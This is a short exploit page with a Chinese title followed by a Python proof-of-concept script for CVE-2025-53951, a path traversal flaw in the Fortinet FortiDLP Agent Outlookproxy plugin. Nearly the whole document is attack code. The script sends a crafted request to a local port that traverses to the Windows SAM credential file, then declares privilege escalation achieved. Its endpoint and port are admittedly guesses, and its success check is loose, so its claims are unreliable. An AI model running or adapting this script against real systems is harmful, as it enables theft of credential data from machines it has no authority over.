CVE-2025-53951 Fortinet FortiDLP Agent路径遍历权限提升漏洞

# CVE-2025-53951 - Fortinet FortiDLP Agent Outlookproxy Path Traversal PoC # Exploits improper path limitation (CWE-22) for privilege escalation to LocalService # Affected: FortiDLP Agent Windows versions 10.3.1 through 11.5.1 import socket import sys TARGET_HOST = "127.0.0.1" # Localhost - plugin listens on a local port TARGET_PORT = 49152 # Default Outlookproxy plugin listening port (may vary) def build_path_traversal_payload(target_path="..\\..\\..\\Windows\\System32\\config\\SAM"): """ Build a crafted request with path traversal sequences to exploit CWE-22 in the FortiDLP Agent Outlookproxy plugin. """ # The Outlookproxy plugin processes requests containing file path references. # By injecting traversal sequences, the attacker can escape the intended directory. payload = ( f"GET /outlookproxy/file?path={target_path} HTTP/1.1\r\n" f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n" f"User-Agent: Mozilla/5.0\r\n" f"Connection: close\r\n" f"\r\n" ) return payload.encode() def exploit(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((TARGET_HOST, TARGET_PORT)) print(f"[+] Connected to {TARGET_HOST}:{TARGET_PORT}") payload = build_path_traversal_payload() sock.send(payload) print(f"[+] Sent path traversal payload") response = sock.recv(4096) print(f"[+] Received response:\n{response.decode(errors='ignore')}") # If the traversal succeeds, the response may contain sensitive data # or confirm access to restricted resources, indicating LocalService # level access has been achieved. if b"200 OK" in response or b"success" in response.lower(): print("[!] Path traversal succeeded - privilege escalation possible") print("[!] LocalService context achieved") sock.close() except Exception as e: print(f"[-] Exploit failed: {e}") sys.exit(1) if __name__ == "__main__": print("[*] CVE-2025-53951 PoC - Fortinet FortiDLP Agent Path Traversal") print("[*] Targeting Outlookproxy plugin local listening port") exploit()